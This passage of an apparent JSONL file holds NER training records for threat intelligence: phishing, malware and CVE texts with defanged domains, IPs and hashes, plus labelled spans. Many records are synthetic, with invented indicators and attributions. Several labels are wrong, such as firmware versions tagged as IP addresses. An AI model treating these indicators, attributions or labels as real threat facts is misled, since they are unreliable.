admin@document-share[ . ]link. File C:\\Program Files\\Common Files\\config.dat (MD5: d734ff0838a33dd15ae2c8d5c6089b62) was identified as the initial dropper. A staging URL hxxps://authedge[ . ]site/portal/verify resolved to 71 [ . ] 9 [ . ] 121 [ . ] 6. Secondary artifact hash: MD5: 6478fccc188d34653833b2b2791778f1.", "spans": {"Indicator: 172.20.113.22": [[306, 325]], "Indicator: mailedge.dev": [[330, 346]], "Indicator: admin@document-share.link": [[391, 420]], "Indicator: d734ff0838a33dd15ae2c8d5c6089b62": [[474, 506]], "Indicator: hxxps://authedge.site/portal/verify": [[561, 600]], "Indicator: 71.9.121.6": [[613, 641]], "Indicator: 6478fccc188d34653833b2b2791778f1": [[673, 705]]}, "info": {"id": "synth_v2_01254", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from finance@login-portal[ . ]tech and billing@identity-verify[ . ]cc, spoofing legitimate services. 
Victims were directed to hxxps://cache-static[.]cc/callback which hosted a credential harvesting page on auth-cdn[.]io. A secondary link hxxps://syncstorage[ . ]com/assets/js/payload.js delivered StealC (MD5: 4adc29400ed734004dab71b19e3da6bb). The malware was saved to /dev/shm/helper.sh and established C2 with 192[.]119[.]174[.]42.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: finance@login-portal.tech": [[99, 128]], "Indicator: billing@identity-verify.cc": [[133, 163]], "Indicator: https://cache-static.cc/callback": [[220, 254]], "Indicator: auth-cdn.io": [[300, 313]], "Indicator: hxxps://syncstorage.com/assets/js/payload.js": [[332, 380]], "Malware: StealC": [[391, 397]], "Indicator: 4adc29400ed734004dab71b19e3da6bb": [[404, 436]], "Indicator: 192.119.174.42": [[507, 527]]}, "info": {"id": "synth_v2_00889", "source": "defanged_augment"}} {"text": "Gatsby is a free and open source framework based on React. The Gatsby framework prior to versions 4.25.7 and 5.9.1 contain a Local File Inclusion vulnerability in the `__file-code-frame` and `__original-stack-frame` paths, exposed when running the Gatsby develop server (`gatsby develop`). Any file in scope of the development server could potentially be exposed. It should be noted that by default `gatsby develop` is only accessible via the localhost `127 [ . ] 0 [ . ] 0 [ . ] 1`, and one would need to intentionally expose the server to other interfaces to exploit this vulnerability by using server options such as `--host 0 [ . ] 0 [ . ] 0 [ . ] 0`, `-H 0 [ . ] 0 [ . ] 0 [ . ] 0`, or the `GATSBY_HOST=0[.]0[.]0[.]0` environment variable. A patch has been introduced in `gatsby@5.9.1` and `gatsby@4.25.7` which mitigates the issue. Users are advised to upgrade. 
Users unable to upgrade should avoid exposing their development server to the internet.", "spans": {"Indicator: 127.0.0.1": [[454, 481]], "Indicator: 0.0.0.0": [[628, 653], [660, 685], [708, 721]], "Vulnerability: Local File Inclusion": [[125, 145]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-34238"}} {"text": "A Chinese advanced persistent threat APT compromised Forbes[.]com to set up a watering hole style web-based drive-by attack against US Defense and Financial Services firms in late November 2014.", "spans": {"Vulnerability: watering hole style web-based drive-by attack": [[78, 123]], "Organization: US Defense": [[132, 142]], "Organization: Financial Services firms": [[147, 171]], "Indicator: Forbes.com": [[53, 65]]}, "info": {"id": "cyner2_train_003204", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/huge_memory: fix folio isn't locked in softleaf_to_folio()\n\nOn arm64 server, we found folio that get from migration entry isn't locked\nin softleaf_to_folio(). This issue triggers when mTHP splitting and\nzap_nonpresent_ptes() races, and the root cause is lack of memory barrier\nin softleaf_to_folio(). The race is as follows:\n\n\tCPU0 CPU1\n\ndeferred_split_scan() zap_nonpresent_ptes()\n lock folio\n split_folio()\n unmap_folio()\n change ptes to migration entries\n __split_folio_to_order() softleaf_to_folio()\n set flags(including PG_locked) for tail pages folio = pfn_folio(softleaf_to_pfn(entry))\n smp_wmb() VM_WARN_ON_ONCE(!folio_test_locked(folio))\n prep_compound_page() for tail pages\n\nIn __split_folio_to_order(), smp_wmb() guarantees page flags of tail pages\nare visible before the tail page becomes non-compound. smp_wmb() should\nbe paired with smp_rmb() in softleaf_to_folio(), which is missed. 
As a\nresult, if zap_nonpresent_ptes() accesses migration entry that stores tail\npfn, softleaf_to_folio() may see the updated compound_head of tail page\nbefore page->flags.\n\nThis issue will trigger VM_WARN_ON_ONCE() in pfn_swap_entry_folio()\nbecause of the race between folio split and zap_nonpresent_ptes()\nleading to a folio incorrectly undergoing modification without a folio\nlock being held.\n\nThis is a BUG_ON() before commit 93976a20345b (\"mm: eliminate further\nswapops predicates\"), which in merged in v6.19-rc1.\n\nTo fix it, add missing smp_rmb() if the softleaf entry is migration entry\nin softleaf_to_folio() and softleaf_to_page().\n\n[tujinjiang@huawei[ . ]com: update function name and comments]", "spans": {"Indicator: huawei.com": [[1794, 1808]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-31466"}} {"text": "HUAWEI Mate 20 versions Versions earlier than 10[.]1[.]0[.]160(C00E160R3P8);HUAWEI Mate 20 Pro versions Versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 270(C431E7R1P5),Versions earlier than 10[.]1[.]0[.]270(C635E3R1P5),Versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 273(C636E7R2P4);HUAWEI Mate 20 X versions Versions earlier than 10[.]1[.]0[.]160(C00E160R2P8);HUAWEI P30 versions Versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10[.]1[.]0[.]160(C00E160R2P8);HUAWEI Mate 20 RS versions Versions earlier than 10[.]1[.]0[.]160(C786E160R3P8);HonorMagic2 versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 187(C00E61R2P11);Honor20 versions Versions earlier than 10[.]0[.]0[.]175(C00E58R4P11);Honor20 PRO versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 194(C00E62R8P12);HonorMagic2 versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 187(C00E61R2P11);HonorV20 versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 188(C00E62R2P11) have an improper authentication vulnerability. 
The system does not properly sign certain encrypted file, the attacker should gain the key used to encrypt the file, successful exploit could cause certain file be forged", "spans": {"Indicator: 10.1.0.160": [[46, 62], [329, 345], [401, 429], [490, 506], [569, 585]], "Indicator: 10.1.0.270": [[126, 154], [189, 205]], "Indicator: 10.1.0.273": [[240, 268]], "Indicator: 10.0.0.187": [[643, 671], [882, 910]], "Indicator: 10.0.0.175": [[724, 740]], "Indicator: 10.0.0.194": [[797, 825]], "Indicator: 10.0.0.188": [[964, 992]], "Vulnerability: improper authentication": [[1014, 1037]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-9244"}} {"text": "Vulnerability Advisory: CVE-2021-20463 is a critical authentication bypass affecting Windows 11. Cisco Talos confirmed active exploitation by APT29 in the wild. Exploitation delivers ShadowPad (MD5: 668e0db3b11603a371aad1719be99e09) which is dropped to /etc/cron.d/config.dat. The exploit payload is hosted at hxxp://mailcache[ . ]club/panel/index.html and communicates to 59 [ . ] 245 [ . ] 175 [ . ] 59 for C2.", "spans": {"Vulnerability: CVE-2021-20463": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Windows 11": [[85, 95]], "Organization: Cisco Talos": [[97, 108]], "Malware: ShadowPad": [[183, 192]], "Indicator: 668e0db3b11603a371aad1719be99e09": [[199, 231]], "Indicator: http://mailcache.club/panel/index.html": [[310, 352]], "Indicator: 59.245.175.59": [[373, 404]]}, "info": {"id": "synth_v2_00759", "source": "defanged_augment"}} {"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center . In this case the legitimate hpqhvind[ . 
]exe was dropped by the attackers , along with their malicious hpqhvsei[ . ]dll , in C:\\Windows\\Temp . KillNet has remained relatively consistent in its targeting of Ukraine ’s supporters and prioritization of DDoS attacks since Russia invaded in February 2022 , and despite new capabilities , the collective has hardly altered its targeting patterns .", "spans": {"Organization: employees": [[376, 385]], "Indicator: hpqhvind.exe": [[444, 460]], "Indicator: hpqhvsei.dll": [[519, 535]]}, "info": {"id": "cyberner_stix_train_000386", "source": "defanged_augment"}} {"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . w[redacted][.]livehost[.]live : 443 . w[redacted][ . ]dnslookup[ . ]services : 443 . where the redacted part corresponds to the name of the targeted university . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"Organization: Trend Micro": [[328, 339]], "Indicator: w[redacted].livehost.live": [[375, 404]], "Indicator: w[redacted].dnslookup.services": [[413, 451]], "Vulnerability: vulnerabilities are accessible via the internet": [[577, 624]]}, "info": {"id": "cyberner_stix_train_007510", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Chisel artifacts at /usr/local/bin/lsass.dmp. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via /var/tmp/sam.hive. Network forensics identified connections to 102[.]11[.]110[.]38 and secure-static[.]tech. Email headers traced the initial vector to report@document-share[ . ]link. 
File C:\\Users\\admin\\Downloads\\taskhost.exe (MD5: 79453a7147bc47adcc84203273bc0114) was identified as the initial dropper. A staging URL hxxp://relaydata[.]club/collect resolved to 172[.]152[.]37[.]138. Secondary artifact hash: SHA256: 2eda58c885ea72f87853e0cb2aa8ae1923988cffd920d231b38b08e3432fcba6.", "spans": {"Indicator: 102.11.110.38": [[286, 305]], "Indicator: secure-static.tech": [[310, 330]], "Indicator: report@document-share.link": [[375, 405]], "Indicator: 79453a7147bc47adcc84203273bc0114": [[456, 488]], "Indicator: http://relaydata.club/collect": [[543, 574]], "Indicator: 172.152.37.138": [[587, 607]], "Indicator: 2eda58c885ea72f87853e0cb2aa8ae1923988cffd920d231b38b08e3432fcba6": [[642, 706]]}, "info": {"id": "synth_v2_01245", "source": "defanged_augment"}} {"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . APT33 : 217 [ . ] 13 [ . ] 103 [ . ] 46 securityupdated[ . ]com . 
By comparison , the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER .", "spans": {"Organization: Check Point": [[4, 15]], "Malware: HummingBad": [[61, 71], [134, 144]], "Organization: Lookout": [[122, 129]], "Malware: Shedun": [[156, 162]], "Indicator: 217.13.103.46": [[461, 492]], "Indicator: securityupdated.com": [[493, 516]], "Malware: INDUSTROYER.V2": [[539, 553]], "Malware: malware": [[620, 627]], "Malware: INDUSTROYER": [[679, 690]]}, "info": {"id": "cyberner_stix_train_005941", "source": "defanged_augment"}} {"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at C:\\Users\\admin\\AppData\\Local\\Temp\\csrss.exe - SHA256: a16a35403663a1262b4080e869303cc5f48c6278af283b0ebb6118822bc25c9f\nStage 2 loader at C:\\Windows\\Tasks\\implant.so - SHA1: c61f85d8f083079b4c2d2f2188786d1c8dc6d201\nFinal payload at C:\\Users\\admin\\Desktop\\lsass.dmp - SHA1: 2d1f09ae91bf2bf9f10c5e61138fdea4d3a2bbcf\nExfiltration module - SHA1: 5fb3b7373a3f44942e0d0dd1b14ab29a34ce1912\nAll stages communicated with 153 [ . ] 90 [ . ] 110 [ . ] 61. LinPEAS signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: a16a35403663a1262b4080e869303cc5f48c6278af283b0ebb6118822bc25c9f": [[114, 178]], "Indicator: c61f85d8f083079b4c2d2f2188786d1c8dc6d201": [[233, 273]], "Indicator: 2d1f09ae91bf2bf9f10c5e61138fdea4d3a2bbcf": [[332, 372]], "Indicator: 5fb3b7373a3f44942e0d0dd1b14ab29a34ce1912": [[401, 441]], "Indicator: 153.90.110.61": [[471, 502]]}, "info": {"id": "synth_v2_01993", "source": "defanged_augment"}} {"text": "Screenshots : captures an image of the current screen via the raw frame buffer . The current campaign is a sharp escalation of detected activity since summer 2017 . Winnti : 44260a1d 2018-08-15 10:59:09 hxxps://dump[.]gxxservice[.]com/common/up/up_base.php . 
The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"Indicator: https://dump.gxxservice.com/common/up/up_base.php": [[203, 256]]}, "info": {"id": "cyberner_stix_train_002342", "source": "defanged_augment"}} {"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity . APT33 : 8[.]26[.]21[.]120 mynetwork[.]ddns[.]net . The ThreatConnect Platform centralizes threat intelligence , automates key activities and enables information sharing across the internal security organization and with external partners .", "spans": {"Organization: DHS": [[317, 320]], "Organization: FBI": [[325, 328]], "Indicator: 8.26.21.120": [[463, 480]], "Indicator: mynetwork.ddns.net": [[481, 503]]}, "info": {"id": "cyberner_stix_train_007225", "source": "defanged_augment"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online[.]bankaustria[.]at.id8817466 [ . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Unknown .", "spans": {"Malware: Sea Turtle": [[137, 147]], "Indicator: online.bankaustria.at": [[30, 55]]}, "info": {"id": "cyberner_stix_train_003963", "source": "defanged_augment"}} {"text": "FIN7, also known as Carbanak Group and ITG14, targeted the U.S. hospitality and retail sectors with novel malware. The group sent phishing emails with malicious DOCX attachments exploiting CVE-2023-36884 in Microsoft Office. 
The payload, a JScript backdoor named Lizar, was dropped to C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js and beaconed to the C2 domain cdn-static-updates[ . ]com at IP 185 [ . ] 219 [ . ] 52 [ . ] 229. Additional C2 domains: api-gateway-service[ . ]com and storage-cloud-backup[.]net. The group also deployed Carbanak backdoor (SHA256 d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2) and used BloodHound for Active Directory reconnaissance. Cobalt Strike beacons connected to 45 [ . ] 129 [ . ] 14 [ . ] 88 and 91[.]195[.]240[.]117. The Lizar implant communicated over DNS TXT records to evade network detection.", "spans": {"Vulnerability: CVE-2023-36884": [[189, 203]], "System: Microsoft Office": [[207, 223]], "Malware: Lizar": [[263, 268], [775, 780]], "Indicator: cdn-static-updates.com": [[356, 382]], "Indicator: 185.219.52.229": [[389, 421]], "Indicator: api-gateway-service.com": [[446, 473]], "Indicator: storage-cloud-backup.net": [[478, 504]], "Malware: Carbanak": [[530, 538]], "Indicator: d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[556, 620]], "Malware: Cobalt Strike": [[679, 692]], "Indicator: 45.129.14.88": [[714, 744]], "Indicator: 91.195.240.117": [[749, 769]]}, "info": {"id": "malware_00023", "source": "defanged_augment"}} {"text": "Artifact Analysis for StealC campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\payload.bin - MD5: 0c7c14a5a6c4fa603c4a8f1b24db09c2\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\sam.hive - SHA256: 0c44c651b481b3f2094a0e066ea6f274fa99be82235a944aa247f8d86927fe49\nFinal payload at /home/user/.config/chrome_helper.exe - SHA256: 988f361295b6c849bf478e26cd64f752b9a1a4fd7d8fe249bd8228e2145768bd\nExfiltration module - SHA256: 138418c77d26a48d6b3da213e52b9119e096659c22d4db8707c543135bf01b24\nAll stages communicated with 56[.]244[.]25[.]242. 
PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: StealC": [[22, 28]], "Indicator: 0c7c14a5a6c4fa603c4a8f1b24db09c2": [[94, 126]], "Indicator: 0c44c651b481b3f2094a0e066ea6f274fa99be82235a944aa247f8d86927fe49": [[198, 262]], "Indicator: 988f361295b6c849bf478e26cd64f752b9a1a4fd7d8fe249bd8228e2145768bd": [[327, 391]], "Indicator: 138418c77d26a48d6b3da213e52b9119e096659c22d4db8707c543135bf01b24": [[422, 486]], "Indicator: 56.244.25.242": [[516, 535]]}, "info": {"id": "synth_v2_01931", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Teper Trojan/AutoRun[ . ]Delf[ . ]lv Trojan.MSIL.Krypt.11 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_INJECTOR_FA250012.UVPM Trojan.Win32.DarkKomet.dkhkpy TrojWare.MSIL.Teper.A Trojan.PWS.Stealer.13025 TROJ_INJECTOR_FA250012.UVPM BehavesLike.Win32.Trojan.dc Backdoor/Androm.dvy TR/Inject.xbbeiet W32/Vobfus.GEP.worm Win32/AutoRun[ . ]Delf[ . ]LV Win32.Worm.Autorun.Suxp Win32/Trojan.d74", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: AutoRun.Delf.lv": [[46, 69]], "Indicator: AutoRun.Delf.LV": [[359, 382]]}, "info": {"id": "cyner2_train_007255", "source": "defanged_augment"}} {"text": "Proofpoint detected a multi-stage attack chain. The initial phishing email from noreply@secure-verify[.]net contained a link to hxxps://static-edge[ . ]io/portal/verify. This redirected to hxxp://static-cloud[.]xyz/assets/js/payload.js on proxydata[.]link. A secondary email from ceo@auth-check[ . ]org pointed to hxxps://relay-login[ . ]info/secure/token which delivered Ryuk. 
The final payload callback was hxxps://secure-proxy[.]tech/download/update.exe resolving to 10[.]163[.]25[.]199 via proxy-secure[.]org.", "spans": {"Organization: Proofpoint": [[0, 10]], "Indicator: noreply@secure-verify.net": [[80, 107]], "Indicator: hxxps://static-edge.io/portal/verify": [[128, 168]], "Indicator: http://static-cloud.xyz/assets/js/payload.js": [[189, 235]], "Indicator: proxydata.link": [[239, 255]], "Indicator: ceo@auth-check.org": [[280, 302]], "Indicator: https://relay-login.info/secure/token": [[314, 355]], "Malware: Ryuk": [[372, 376]], "Indicator: https://secure-proxy.tech/download/update.exe": [[409, 456]], "Indicator: 10.163.25.199": [[470, 489]], "Indicator: proxy-secure.org": [[494, 512]]}, "info": {"id": "synth_v2_01847", "source": "defanged_augment"}} {"text": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects AC2100 before 1 [ . ] 2 [ . ] 0 [ . ] 72, AC2400 before 1[.]2[.]0[.]72, AC2600 before 1[.]2[.]0[.]72, CBK40 before 2 [ . ] 5 [ . ] 0 [ . ] 10, CBR40 before 2 [ . ] 5 [ . ] 0 [ . ] 10, D6000 before 1 [ . ] 0 [ . ] 0 [ . ] 80, D6220 before 1 [ . ] 0 [ . ] 0 [ . ] 60, D6400 before 1 [ . ] 0 [ . ] 0 [ . ] 94, D7000v2 before 1 [ . ] 0 [ . ] 0 [ . ] 62, D7800 before 1[.]0[.]3[.]48, D8500 before 1[.]0[.]3[.]50, DC112A before 1[.]0[.]0[.]48, DGN2200v4 before 1 [ . ] 0 [ . ] 0 [ . ] 114, DM200 before 1[.]0[.]0[.]66, EAX20 before 1 [ . ] 0 [ . ] 0 [ . ] 36, EAX80 before 1[.]0[.]1[.]62, EX2700 before 1[.]0[.]1[.]58, EX3110 before 1[.]0[.]1[.]68, EX3700 before 1[.]0[.]0[.]84, EX3800 before 1[.]0[.]0[.]84, EX3920 before 1 [ . ] 0 [ . ] 0 [ . ] 84, EX6000 before 1 [ . ] 0 [ . ] 0 [ . ] 44, EX6100v2 before 1[.]0[.]1[.]94, EX6110 before 1[.]0[.]1[.]68, EX6120 before 1 [ . ] 0 [ . ] 0 [ . ] 54, EX6130 before 1 [ . ] 0 [ . ] 0 [ . ] 36, EX6150v1 before 1[.]0[.]0[.]46, EX6150v2 before 1[.]0[.]1[.]94, EX6200v1 before 1[.]0[.]3[.]94, EX6250 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX6400 before 1 [ . ] 0 [ . 
] 2 [ . ] 152, EX6400v2 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX6410 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX6920 before 1 [ . ] 0 [ . ] 0 [ . ] 54, EX7000 before 1[.]0[.]1[.]90, EX7300 before 1 [ . ] 0 [ . ] 2 [ . ] 152, EX7300v2 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX7320 before 1 [ . ] 0 [ . ] 0 [ . ] 128, EX7500 before 1[.]0[.]0[.]68, EX7700 before 1[.]0[.]0[.]210, EX8000 before 1 [ . ] 0 [ . ] 1 [ . ] 224, MK62 before 1[.]0[.]5[.]102, MR60 before 1[.]0[.]5[.]102, MS60 before 1[.]0[.]5[.]102, R6120 before 1[.]0[.]0[.]70, R6220 before 1[.]1[.]0[.]100, R6230 before 1[.]1[.]0[.]100, R6250 before 1[.]0[.]4[.]42, R6260 before 1[.]1[.]0[.]76, R6300v2 before 1 [ . ] 0 [ . ] 4 [ . ] 42, R6330 before 1[.]1[.]0[.]76, R6350 before 1 [ . ] 1 [ . ] 0 [ . ] 76, R6400v1 before 1 [ . ] 0 [ . ] 1 [ . ] 62, R6400v2 before 1[.]0[.]4[.]98, R6700v1 before 1[.]0[.]2[.]16, R6700v2 before 1[.]2[.]0[.]72, R6700v3 before 1[.]0[.]4[.]98, R6800 before 1[.]2[.]0[.]72, R6800 before 1[.]2[.]0[.]72, R6850 before 1 [ . ] 1 [ . ] 0 [ . ] 76, R6900 before 1 [ . ] 0 [ . ] 2 [ . ] 16, R6900P before 1 [ . ] 3 [ . ] 2 [ . ] 124, R6900v2 before 1[.]2[.]0[.]72, R7000 before 1 [ . ] 0 [ . ] 11 [ . ] 106, R7000P before 1 [ . ] 3 [ . ] 2 [ . ] 124, R7100LG before 1[.]0[.]0[.]56, R7200 before 1[.]2[.]0[.]72, R7350 before 1[.]2[.]0[.]72, R7400 before 1 [ . ] 2 [ . ] 0 [ . ] 72, R7450 before 1 [ . ] 2 [ . ] 0 [ . ] 72, R7500v2 before 1[.]0[.]3[.]48, R7800 before 1 [ . ] 0 [ . ] 2 [ . ] 74, R7850 before 1[.]0[.]5[.]60, R7900 before 1 [ . ] 0 [ . ] 4 [ . ] 26, R7900P before 1[.]4[.]1[.]62, R7960P before 1[.]4[.]1[.]62, R8000 before 1 [ . ] 0 [ . ] 4 [ . ] 58, R8000P before 1[.]4[.]1[.]62, R8300 before 1[.]0[.]2[.]134, R8500 before 1 [ . ] 0 [ . ] 2 [ . ] 134, R8900 before 1[.]0[.]5[.]24, R9000 before 1[.]0[.]5[.]24, RAX120 before 1 [ . ] 0 [ . ] 1 [ . ] 136, RAX15 before 1[.]0[.]1[.]64, RAX20 before 1 [ . ] 0 [ . ] 1 [ . ] 64, RAX200 before 1 [ . ] 0 [ . ] 5 [ . ] 24, RAX35 before 1 [ . ] 0 [ . ] 3 [ . 
] 80, RAX40 before 1[.]0[.]3[.]80, RAX45 before 1[.]0[.]2[.]64, RAX50 before 1 [ . ] 0 [ . ] 2 [ . ] 64, RAX75 before 1[.]0[.]3[.]102, RAX80 before 1 [ . ] 0 [ . ] 3 [ . ] 102, RBK12 before 2 [ . ] 6 [ . ] 1 [ . ] 44, RBR10 before 2[.]6[.]1[.]44, RBS10 before 2[.]6[.]1[.]44, RBK20 before 2[.]6[.]1[.]38, RBR20 before 2[.]6[.]1[.]36, RBS20 before 2[.]6[.]1[.]38, RBK40 before 2 [ . ] 6 [ . ] 1 [ . ] 38, RBR40 before 2[.]6[.]1[.]38, RBS40 before 2[.]6[.]1[.]38, RBK50 before 2[.]6[.]1[.]40, RBR50 before 2[.]6[.]1[.]40, RBS50 before 2 [ . ] 6 [ . ] 1 [ . ] 40, RBK752 before 3[.]2[.]16[.]6, RBR750 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBS750 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBK842 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBR840 before 3 [ . ] 2 [ . ] 16 [ . ] 6, RBS840 before 3[.]2[.]16[.]6, RBK852 before 3[.]2[.]16[.]6, RBR850 before 3[.]2[.]16[.]6, RBS850 before 3[.]2[.]16[.]6, RBS40V before 2 [ . ] 5 [ . ] 1 [ . ] 6, RBS40V-200 before 1 [ . ] 0 [ . ] 0 [ . ] 46, RBS50Y before 2 [ . ] 6 [ . ] 1 [ . ] 40, RBW30 before 2 [ . ] 5 [ . ] 0 [ . ] 4, RS400 before 1[.]5[.]0[.]48, WN2500RPv2 before 1[.]0[.]1[.]56, WN3000RPv3 before 1[.]0[.]2[.]86, WN3500RPv1 before 1[.]0[.]0[.]28, WNDR3400v3 before 1[.]0[.]1[.]32, WNR1000v3 before 1[.]0[.]2[.]78, WNR2000v2 before 1 [ . ] 2 [ . ] 0 [ . ] 12, XR300 before 1 [ . ] 0 [ . ] 3 [ . ] 50, XR450 before 2 [ . ] 3 [ . ] 2 [ . ] 66, XR500 before 2 [ . ] 3 [ . ] 2 [ . 
] 66, and XR700 before 1[.]0[.]1[.]34.", "spans": {"Indicator: 1.2.0.72": [[113, 139], [155, 169], [185, 199], [2076, 2090], [2136, 2150], [2165, 2179], [2321, 2335], [2467, 2481], [2496, 2510], [2525, 2551], [2566, 2592]], "Indicator: 2.5.0.10": [[214, 240], [255, 281]], "Indicator: 1.0.0.80": [[296, 322]], "Indicator: 1.0.0.60": [[337, 363]], "Indicator: 1.0.0.94": [[378, 404]], "Indicator: 1.0.0.62": [[421, 447]], "Indicator: 1.0.3.48": [[462, 476], [2609, 2623]], "Indicator: 1.0.3.50": [[491, 505], [4491, 4517]], "Indicator: 1.0.0.48": [[521, 535]], "Indicator: 1.0.0.114": [[554, 581]], "Indicator: 1.0.0.66": [[596, 610]], "Indicator: 1.0.0.36": [[625, 651], [1004, 1030]], "Indicator: 1.0.1.62": [[666, 680], [1971, 1997]], "Indicator: 1.0.1.58": [[696, 710]], "Indicator: 1.0.1.68": [[726, 740], [932, 946]], "Indicator: 1.0.0.84": [[756, 770], [786, 800], [816, 842]], "Indicator: 1.0.0.44": [[858, 884]], "Indicator: 1.0.1.94": [[902, 916], [1080, 1094]], "Indicator: 1.0.0.54": [[962, 988], [1316, 1342]], "Indicator: 1.0.0.46": [[1048, 1062], [4125, 4151]], "Indicator: 1.0.3.94": [[1112, 1126]], "Indicator: 1.0.0.128": [[1142, 1169], [1230, 1257], [1273, 1300], [1433, 1460], [1476, 1503]], "Indicator: 1.0.2.152": [[1185, 1212], [1388, 1415]], "Indicator: 1.0.1.90": [[1358, 1372]], "Indicator: 1.0.0.68": [[1519, 1533]], "Indicator: 1.0.0.210": [[1549, 1564]], "Indicator: 1.0.1.224": [[1580, 1607]], "Indicator: 1.0.5.102": [[1621, 1636], [1650, 1665], [1679, 1694]], "Indicator: 1.0.0.70": [[1709, 1723]], "Indicator: 1.1.0.100": [[1738, 1753], [1768, 1783]], "Indicator: 1.0.4.42": [[1798, 1812], [1858, 1884]], "Indicator: 1.1.0.76": [[1827, 1841], [1899, 1913], [1928, 1954], [2194, 2220]], "Indicator: 1.0.4.98": [[2014, 2028], [2107, 2121]], "Indicator: 1.0.2.16": [[2045, 2059], [2235, 2261]], "Indicator: 1.3.2.124": [[2277, 2304], [2394, 2421]], "Indicator: 1.0.11.106": [[2350, 2378]], "Indicator: 1.0.0.56": [[2438, 2452]], "Indicator: 1.0.2.74": [[2638, 2664]], 
"Indicator: 1.0.5.60": [[2679, 2693]], "Indicator: 1.0.4.26": [[2708, 2734]], "Indicator: 1.4.1.62": [[2750, 2764], [2780, 2794], [2851, 2865]], "Indicator: 1.0.4.58": [[2809, 2835]], "Indicator: 1.0.2.134": [[2880, 2895], [2910, 2937]], "Indicator: 1.0.5.24": [[2952, 2966], [2981, 2995], [3124, 3150]], "Indicator: 1.0.1.136": [[3011, 3038]], "Indicator: 1.0.1.64": [[3053, 3067], [3082, 3108]], "Indicator: 1.0.3.80": [[3165, 3191], [3206, 3220]], "Indicator: 1.0.2.64": [[3235, 3249], [3264, 3290]], "Indicator: 1.0.3.102": [[3305, 3320], [3335, 3362]], "Indicator: 2.6.1.44": [[3377, 3403], [3418, 3432], [3447, 3461]], "Indicator: 2.6.1.38": [[3476, 3490], [3534, 3548], [3563, 3589], [3604, 3618], [3633, 3647]], "Indicator: 2.6.1.36": [[3505, 3519]], "Indicator: 2.6.1.40": [[3662, 3676], [3691, 3705], [3720, 3746], [4167, 4193]], "Indicator: 3.2.16.6": [[3762, 3776], [3792, 3818], [3834, 3860], [3876, 3902], [3918, 3944], [3960, 3974], [3990, 4004], [4020, 4034], [4050, 4064]], "Indicator: 2.5.1.6": [[4080, 4105]], "Indicator: 2.5.0.4": [[4208, 4233]], "Indicator: 1.5.0.48": [[4248, 4262]], "Indicator: 1.0.1.56": [[4282, 4296]], "Indicator: 1.0.2.86": [[4316, 4330]], "Indicator: 1.0.0.28": [[4350, 4364]], "Indicator: 1.0.1.32": [[4384, 4398]], "Indicator: 1.0.2.78": [[4417, 4431]], "Indicator: 1.2.0.12": [[4450, 4476]], "Indicator: 2.3.2.66": [[4532, 4558], [4573, 4599]], "Indicator: 1.0.1.34": [[4618, 4632]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35800"}} {"text": "Malware Analysis Report: Lumma Stealer (SHA256: 